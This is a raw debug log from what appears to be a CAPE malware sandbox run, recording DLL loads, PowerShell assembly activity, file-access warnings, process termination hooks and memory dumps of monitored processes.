2019-08-13 23:41:22,999 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9ZOG3AYK6S7RIC8L0R98.temp'
2019-08-13 23:41:23,015 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:23,015 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9ZOG3AYK6S7RIC8L0R98.temp'
2019-08-13 23:41:23,015 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP'
2019-08-13 23:41:23,029 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:23,029 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp" does not exist, skip.
2019-08-13 23:41:23,046 [root] INFO: Process with pid 1544 has terminated
2019-08-13 23:41:23,046 [root] INFO: Process with pid 1628 has terminated
2019-08-13 23:41:23,046 [root] INFO: Process with pid 2056 has terminated
2019-08-13 23:41:23,092 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:23,092 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp" does not exist, skip.
2019-08-13 23:41:23,108 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:23,108 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:23,108 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:23,108 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:23,124 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:23,140 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:23,154 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:23,171 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:23,171 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:23,217 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:23,249 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:23,263 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:23,279 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:23,296 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:23,296 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:23,311 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:23,326 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:23,326 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:23,342 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\C6G2ARDY24RHA3XN3YP9.temp'
2019-08-13 23:41:23,342 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\C6G2ARDY24RHA3XN3YP9.temp'
2019-08-13 23:41:23,342 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:23,358 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\C6G2ARDY24RHA3XN3YP9.temp'
2019-08-13 23:41:23,358 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP'
2019-08-13 23:41:23,358 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:23,374 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp" does not exist, skip.
2019-08-13 23:41:23,374 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:23,374 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp" does not exist, skip.
2019-08-13 23:41:23,388 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:23,388 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:23,404 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:23,404 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:23,404 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:23,404 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:23,420 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:23,436 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:23,436 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:23,436 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:23,451 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:23,467 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:23,483 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:23,497 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-08-13 23:41:23,513 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:23,529 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:23,592 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:23,608 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:23,608 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:23,622 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:23,622 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1964
2019-08-13 23:41:23,622 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:23,622 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3004
2019-08-13 23:41:23,622 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:23,622 [root] DEBUG: GetHookCallerBase: thread 2820 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:23,622 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:23,638 [root] DEBUG: GetHookCallerBase: thread 1928 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:23,638 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:23,638 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:23,654 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:23,654 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:23,654 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:23,654 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:23,654 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:23,670 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:23,670 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:23,670 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:23,686 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:23,686 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1964_562778298431214382019
2019-08-13 23:41:23,700 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:23,700 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:23,700 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:23,717 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:23,717 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:23,747 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\3004_1226236078431214382019
2019-08-13 23:41:23,763 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:23,763 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:23,763 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:23,795 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:23,795 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:23,795 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:23,795 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:23,795 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:23,809 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:23,825 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:23,825 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:23,825 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:23,825 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:23,842 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:23,842 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:23,842 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:23,842 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:23,842 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:23,842 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:23,857 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:23,857 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:23,857 [root] INFO: Notified of termination of process with pid 1964.
2019-08-13 23:41:23,857 [root] INFO: Notified of termination of process with pid 3004.
2019-08-13 23:41:23,857 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:23,872 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:23,872 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1356
2019-08-13 23:41:23,872 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3020
2019-08-13 23:41:23,872 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:23,888 [root] DEBUG: GetHookCallerBase: thread 2924 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:23,888 [root] DEBUG: GetHookCallerBase: thread 1996 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:23,888 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:23,888 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:23,888 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:23,904 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:23,920 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:23,920 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:23,920 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:23,920 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:23,920 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:23,934 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:23,934 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:23,934 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:23,950 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:23,950 [root] DEBUG: Error 2 (0x2) - savePeFileToDisk: There was a problem renaming the file: The system cannot find the file specified.
2019-08-13 23:41:23,950 [root] DEBUG: Error 2 (0x2) - savePeFileToDisk: There was a problem deleting the file: C:\Users\user\AppData\Local\Temp\CapeOutput.bin: The system cannot find the file specified.
2019-08-13 23:41:23,950 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:23,966 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:23,966 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:23,966 [root] INFO: Notified of termination of process with pid 3020.
2019-08-13 23:41:23,966 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1356_1553589998231214382019
2019-08-13 23:41:23,982 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:23,982 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:23,982 [root] INFO: Notified of termination of process with pid 1356.
2019-08-13 23:41:23,997 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:24,013 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:24,013 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:24,029 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:24,091 [root] DEBUG: DLL loaded at 0x000007FEED730000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:24,091 [root] INFO: Process with pid 2208 has terminated
2019-08-13 23:41:24,091 [root] INFO: Process with pid 3020 has terminated
2019-08-13 23:41:24,091 [root] DEBUG: DLL loaded at 0x000000001D0A0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:24,091 [root] INFO: Process with pid 3004 has terminated
2019-08-13 23:41:24,107 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:24,107 [root] INFO: Process with pid 1964 has terminated
2019-08-13 23:41:24,107 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:24,107 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:24,121 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:24,121 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:24,121 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:24,138 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:24,168 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:24,168 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:24,200 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:24,232 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:24,232 [root] DEBUG: DLL loaded at 0x000007FEED730000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:24,232 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:24,232 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:24,232 [root] DEBUG: DLL loaded at 0x000000001CEC0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:24,246 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:24,246 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:24,263 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:24,278 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:24,278 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:24,278 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
